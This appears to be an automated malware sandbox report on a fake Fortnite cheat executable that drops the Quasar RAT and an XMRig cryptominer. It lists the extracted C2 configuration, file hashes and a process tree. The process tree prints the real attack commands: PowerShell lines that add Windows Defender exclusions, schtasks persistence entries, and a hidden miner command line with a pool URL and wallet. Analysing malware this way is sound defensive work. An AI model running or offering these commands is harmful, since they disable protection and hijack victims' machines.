Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Analysis

  • max time kernel
    150s
  • max time network
    150s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20241007-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
  • submitted
    21/12/2024, 18:49

General

  • Target

    FortniteExternal.exe

  • Size

    39KB

  • MD5

    cffb27bf1ba05391482df627dc8504e4

  • SHA1

    c7deb87c21a1bb2b97e3ded00edf56578acf3aac

  • SHA256

    a9a90a7ba273affb69647f2eabb614e4dcd2c6acbb82c2b1bb3cb4b936e5fffe

  • SHA512

    9132d00fadc97bca3a6246f86bfc745d18227928ecd8a66e2495e788ce628df41b3eaf5270a25f2c7818aef41765a18a3ecb09c2aed3ac47d9d02894098ac1ee

  • SSDEEP

    768:xldEjfYrbTQA+mzUMDmNwS9yVSErxnXneI6zDf9BQj0/nyc3v:xld8mzJmPqSExgzDft/nFv

Malware Config

Extracted

Family

quasar

Version

1.4.1

Botnet

Runtime Broker

C2

92.221.125.55:49868

Mutex

73f0bf3a-83f3-424b-b7a1-a8200df3e317

Attributes
  • encryption_key

    5CB2755608EFDB1313EF4F2ACEA101833F5AEE2B

  • install_name

    Runtime Broker.exe

  • log_directory

    Logs

  • reconnect_delay

    100

  • startup_key

    System

  • subdirectory

    SubDir

Signatures

  • Quasar RAT

    Quasar is an open source Remote Access Tool.

  • Quasar family
  • Quasar payload 2 IoCs
  • Xmrig family
  • xmrig

    XMRig is a high performance, open source, cross platform CPU/GPU miner.

  • XMRig Miner payload 11 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 4 IoCs

    Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

  • Downloads MZ/PE file
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Executes dropped EXE 5 IoCs
  • Adds Run key to start application 2 TTPs 2 IoCs
  • Drops file in System32 directory 11 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Modifies registry class 1 IoCs
  • Scheduled Task/Job: Scheduled Task 1 TTPs 3 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious use of AdjustPrivilegeToken 10 IoCs
  • Suspicious use of FindShellTrayWindow 2 IoCs
  • Suspicious use of SendNotifyMessage 2 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 56 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

Processes

  • C:\Users\Admin\AppData\Local\Temp\FortniteExternal.exe
    "C:\Users\Admin\AppData\Local\Temp\FortniteExternal.exe"
    1⤵
    • Checks computer location settings
    • Adds Run key to start application
    • Drops file in System32 directory
    • Modifies registry class
    • Suspicious use of WriteProcessMemory
    PID:2380
    • C:\Users\Admin\AppData\Local\Temp\cm2.exe
      "C:\Users\Admin\AppData\Local\Temp\cm2.exe"
      2⤵
      • Executes dropped EXE
      • Suspicious use of WriteProcessMemory
      PID:1496
      • C:\Windows\System32\conhost.exe
        "C:\Windows\System32\conhost.exe" "C:\Users\Admin\AppData\Local\Temp\cm2.exe"
        3⤵
        • Drops file in System32 directory
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:3748
        • C:\Windows\System32\cmd.exe
          "cmd" cmd /c powershell -Command "Add-MpPreference -ExclusionPath @(($pwd).path, $env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force" & powershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force" & exit
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:4124
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            powershell -Command "Add-MpPreference -ExclusionPath @(($pwd).path, $env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force"
            5⤵
            • Command and Scripting Interpreter: PowerShell
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:5028
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            powershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force"
            5⤵
            • Command and Scripting Interpreter: PowerShell
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:3556
        • C:\Windows\System32\cmd.exe
          "cmd" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr "C:\Windows\system32\services64.exe"
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:4476
          • C:\Windows\system32\schtasks.exe
            schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr "C:\Windows\system32\services64.exe"
            5⤵
            • Scheduled Task/Job: Scheduled Task
            PID:1484
        • C:\Windows\System32\cmd.exe
          "cmd" cmd /c "C:\Windows\system32\services64.exe"
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:212
          • C:\Windows\system32\services64.exe
            C:\Windows\system32\services64.exe
            5⤵
            • Executes dropped EXE
            • Suspicious use of WriteProcessMemory
            PID:4956
            • C:\Windows\System32\conhost.exe
              "C:\Windows\System32\conhost.exe" "C:\Windows\system32\services64.exe"
              6⤵
              • Drops file in System32 directory
              • Suspicious use of SetThreadContext
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              • Suspicious use of WriteProcessMemory
              PID:1768
              • C:\Windows\System32\cmd.exe
                "cmd" cmd /c powershell -Command "Add-MpPreference -ExclusionPath @(($pwd).path, $env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force" & powershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force" & exit
                7⤵
                • Suspicious use of WriteProcessMemory
                PID:4136
                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                  powershell -Command "Add-MpPreference -ExclusionPath @(($pwd).path, $env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force"
                  8⤵
                  • Command and Scripting Interpreter: PowerShell
                  • Suspicious behavior: EnumeratesProcesses
                  • Suspicious use of AdjustPrivilegeToken
                  PID:4596
                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                  powershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force"
                  8⤵
                  • Command and Scripting Interpreter: PowerShell
                  • Suspicious behavior: EnumeratesProcesses
                  • Suspicious use of AdjustPrivilegeToken
                  PID:448
              • C:\Windows\system32\Microsoft\Libs\sihost64.exe
                "C:\Windows\system32\Microsoft\Libs\sihost64.exe"
                7⤵
                • Executes dropped EXE
                • Suspicious use of WriteProcessMemory
                PID:2800
                • C:\Windows\System32\conhost.exe
                  "C:\Windows\System32\conhost.exe" "/sihost64"
                  8⤵
                    PID:3020
                • C:\Windows\System32\notepad.exe
                  C:\Windows/System32\notepad.exe --cinit-find-x -B --algo="rx/0" --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=xmr-eu1.nanopool.org:10343 --user=88SnrVgESxo4oqDueYzTEcYaJJR5sQpBAJwk5bMuskEg9jWfT5X5eYvhdPu8vWPBV1Tqbx31GitQURNLmvKkBtH5QsY6dN3 --pass= --cpu-max-threads-hint=20 --cinit-stealth-targets="+iU/trnPCTLD3p+slbva5u4EYOS6bvIPemCHGQx2WRUcnFdomWh6dhl5H5KbQCjp6yCYlsFu5LR1mi7nQAy56B+5doUwurAPvCael2sR/N4=" --cinit-idle-wait=5 --cinit-idle-cpu=80 --tls --cinit-stealth
                  7⤵
                  • Suspicious behavior: EnumeratesProcesses
                  • Suspicious use of AdjustPrivilegeToken
                  PID:2104
      • C:\Users\Admin\AppData\Local\Temp\qcmq3.exe
        "C:\Users\Admin\AppData\Local\Temp\qcmq3.exe"
        2⤵
        • Executes dropped EXE
        • Drops file in System32 directory
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:3588
        • C:\Windows\SYSTEM32\schtasks.exe
          "schtasks" /create /tn "System" /sc ONLOGON /tr "C:\Windows\system32\SubDir\Runtime Broker.exe" /rl HIGHEST /f
          3⤵
          • Scheduled Task/Job: Scheduled Task
          PID:752
        • C:\Windows\system32\SubDir\Runtime Broker.exe
          "C:\Windows\system32\SubDir\Runtime Broker.exe"
          3⤵
          • Executes dropped EXE
          • Drops file in System32 directory
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of FindShellTrayWindow
          • Suspicious use of SendNotifyMessage
          • Suspicious use of SetWindowsHookEx
          • Suspicious use of WriteProcessMemory
          PID:4296
          • C:\Windows\SYSTEM32\schtasks.exe
            "schtasks" /create /tn "System" /sc ONLOGON /tr "C:\Windows\system32\SubDir\Runtime Broker.exe" /rl HIGHEST /f
            4⤵
            • Scheduled Task/Job: Scheduled Task
            PID:700

    Network

    MITRE ATT&CK Enterprise v15

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\conhost.exe.log

      Filesize

      539B

      MD5

      b245679121623b152bea5562c173ba11

      SHA1

      47cb7fc4cf67e29a87016a7308cdb8b1b4dc8e3d

      SHA256

      73d84fd03e38f1bbf8b2218f8a454f0879051855252fc76b63f20f46e7fd877f

      SHA512

      75e46843b1eafcc7dc4362630838895b7f399e57662a12bf0305a912c8e726b02e0a760b1b97a2c262b2d05fdb944b9ed81c338ad93e5eb5cb57bc651602e42c

    • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

      Filesize

      2KB

      MD5

      d85ba6ff808d9e5444a4b369f5bc2730

      SHA1

      31aa9d96590fff6981b315e0b391b575e4c0804a

      SHA256

      84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f

      SHA512

      8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

      Filesize

      944B

      MD5

      6d3e9c29fe44e90aae6ed30ccf799ca8

      SHA1

      c7974ef72264bbdf13a2793ccf1aed11bc565dce

      SHA256

      2360634e63e8f0b5748e2c56ebb8f4aa78e71008ea7b5c9ca1c49be03b49557d

      SHA512

      60c38c4367352537545d859f64b9c5cbada94240478d1d039fd27b5ecba4dc1c90051557c16d802269703b873546ead416279c0a80c6fd5e49ad361cef22596a

    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

      Filesize

      944B

      MD5

      e60eb305a7b2d9907488068b7065abd3

      SHA1

      1643dd7f915ac50c75bc01c53d68c5dafb9ce28d

      SHA256

      ad07460e061642c0dd4e7dfa7b821aacce873e290389e72f708e9f3504f9d135

      SHA512

      95c45afec6fa4e0b2a21edd10a6b2dc30568810c67bc9bc34d98ab111c48261f377a370583adb27e08616b0108026c119493b1b093b52ce931117e646b46cb7b

    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

      Filesize

      944B

      MD5

      9c740b7699e2363ac4ecdf496520ca35

      SHA1

      aa8691a8c56500d82c5fc8c35209bc6fe50ab1d9

      SHA256

      be96c91b62ba9ba7072ab89e66543328c9e4395150f9dbe8067332d94a3ecc61

      SHA512

      8885683f96353582eb871209e766e7eba1a72a2837ce27ea298b7b5b169621d1fa3fce25346b6bfd258b52642644234da9559d4e765a2023a5a5fc1f544cc7af

    • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_rdyx4oht.bhd.ps1

      Filesize

      60B

      MD5

      d17fe0a3f47be24a6453e9ef58c94641

      SHA1

      6ab83620379fc69f80c0242105ddffd7d98d5d9d

      SHA256

      96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

      SHA512

      5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

    • C:\Users\Admin\AppData\Local\Temp\cm2.exe

      Filesize

      2.1MB

      MD5

      a954a23215467586a71022e732b23a8d

      SHA1

      c089a6662e8f7bac5ec791b80ec81b77e20bdff4

      SHA256

      007e711c06244bbbbf534b878d665ee0f17abbac80c7d4fb794f357684151751

      SHA512

      e44f9f8aebebbb7a5559b67fe6824cc5637a8961aae2e929bdabfc0720b2b10ae70d7bcb9c132f1a3d6532848184bb3b9ec4f59a11d523dd215173df676860b9

    • C:\Windows\System32\FortniteExternal.exe

      Filesize

      3.1MB

      MD5

      52025b6114feff994df431c8a0a5c9ae

      SHA1

      4b0e9178616c83f68f45775eaacace6027dd42c2

      SHA256

      8c5c09639035ecd95ba08dd6aae713443b3f45614e1fde653b2d6f45156b4e7b

      SHA512

      03ee1109f2d0e79620f7f9fee61411762842cc77ccbc1bc25e98c97278e4ee7745d5e3d46d165761ba5134e228e45c270b1d05cdbda6fef51a3409b8e9cdb73f

    • C:\Windows\System32\Microsoft\Libs\sihost64.exe

      Filesize

      32KB

      MD5

      76dd3f5cec238575932dfbe21ff77b71

      SHA1

      100b90b4c2880405683177513f5ef170257af160

      SHA256

      1e5758dc2cf566629840cf437aadc72f4d5850bea3017f0751c30294989ea348

      SHA512

      0c7d15ff6afe065fec4a20072f909663e2e048582ddfe34d15901cd7e16c4a8ac7911791191d01d5be496b6d1fb4b9492ecc8e271c28ffc263a2cdb4faa7e5d6

    • memory/2104-201-0x0000000140000000-0x0000000140786000-memory.dmp

      Filesize

      7.5MB

    • memory/2104-199-0x0000000140000000-0x0000000140786000-memory.dmp

      Filesize

      7.5MB

    • memory/2104-210-0x0000000140000000-0x0000000140786000-memory.dmp

      Filesize

      7.5MB

    • memory/2104-194-0x0000018360ED0000-0x0000018360EF0000-memory.dmp

      Filesize

      128KB

    • memory/2104-192-0x0000000140000000-0x0000000140786000-memory.dmp

      Filesize

      7.5MB

    • memory/2104-206-0x0000000140000000-0x0000000140786000-memory.dmp

      Filesize

      7.5MB

    • memory/2104-205-0x0000000140000000-0x0000000140786000-memory.dmp

      Filesize

      7.5MB

    • memory/2104-203-0x0000000140000000-0x0000000140786000-memory.dmp

      Filesize

      7.5MB

    • memory/2104-198-0x0000000140000000-0x0000000140786000-memory.dmp

      Filesize

      7.5MB

    • memory/2104-197-0x0000000140000000-0x0000000140786000-memory.dmp

      Filesize

      7.5MB

    • memory/2104-193-0x0000000140000000-0x0000000140786000-memory.dmp

      Filesize

      7.5MB

    • memory/2104-200-0x0000000140000000-0x0000000140786000-memory.dmp

      Filesize

      7.5MB

    • memory/3020-207-0x000001939F830000-0x000001939F836000-memory.dmp

      Filesize

      24KB

    • memory/3020-208-0x000001939FBA0000-0x000001939FBA6000-memory.dmp

      Filesize

      24KB

    • memory/3588-114-0x0000000000870000-0x0000000000B94000-memory.dmp

      Filesize

      3.1MB

    • memory/3748-45-0x000001FC7CC50000-0x000001FC7CE70000-memory.dmp

      Filesize

      2.1MB

    • memory/3748-152-0x00007FFEFA490000-0x00007FFEFAF51000-memory.dmp

      Filesize

      10.8MB

    • memory/3748-54-0x00007FFEFA490000-0x00007FFEFAF51000-memory.dmp

      Filesize

      10.8MB

    • memory/3748-158-0x00007FFEFA490000-0x00007FFEFAF51000-memory.dmp

      Filesize

      10.8MB

    • memory/3748-44-0x00007FFEFA493000-0x00007FFEFA495000-memory.dmp

      Filesize

      8KB

    • memory/3748-154-0x00007FFEFA490000-0x00007FFEFAF51000-memory.dmp

      Filesize

      10.8MB

    • memory/3748-43-0x000001FC620A0000-0x000001FC622C1000-memory.dmp

      Filesize

      2.1MB

    • memory/3748-46-0x000001FC64140000-0x000001FC64152000-memory.dmp

      Filesize

      72KB

    • memory/3748-151-0x00007FFEFA493000-0x00007FFEFA495000-memory.dmp

      Filesize

      8KB

    • memory/3748-110-0x00007FFEFA490000-0x00007FFEFAF51000-memory.dmp

      Filesize

      10.8MB

    • memory/3748-102-0x00007FFEFA490000-0x00007FFEFAF51000-memory.dmp

      Filesize

      10.8MB

    • memory/4296-146-0x000000001E0F0000-0x000000001E1A2000-memory.dmp

      Filesize

      712KB

    • memory/4296-145-0x000000001DFE0000-0x000000001E030000-memory.dmp

      Filesize

      320KB

    • memory/4296-149-0x000000001E070000-0x000000001E082000-memory.dmp

      Filesize

      72KB

    • memory/4296-150-0x000000001E7F0000-0x000000001E82C000-memory.dmp

      Filesize

      240KB

    • memory/5028-124-0x000001D0EBF30000-0x000001D0EBF52000-memory.dmp

      Filesize

      136KB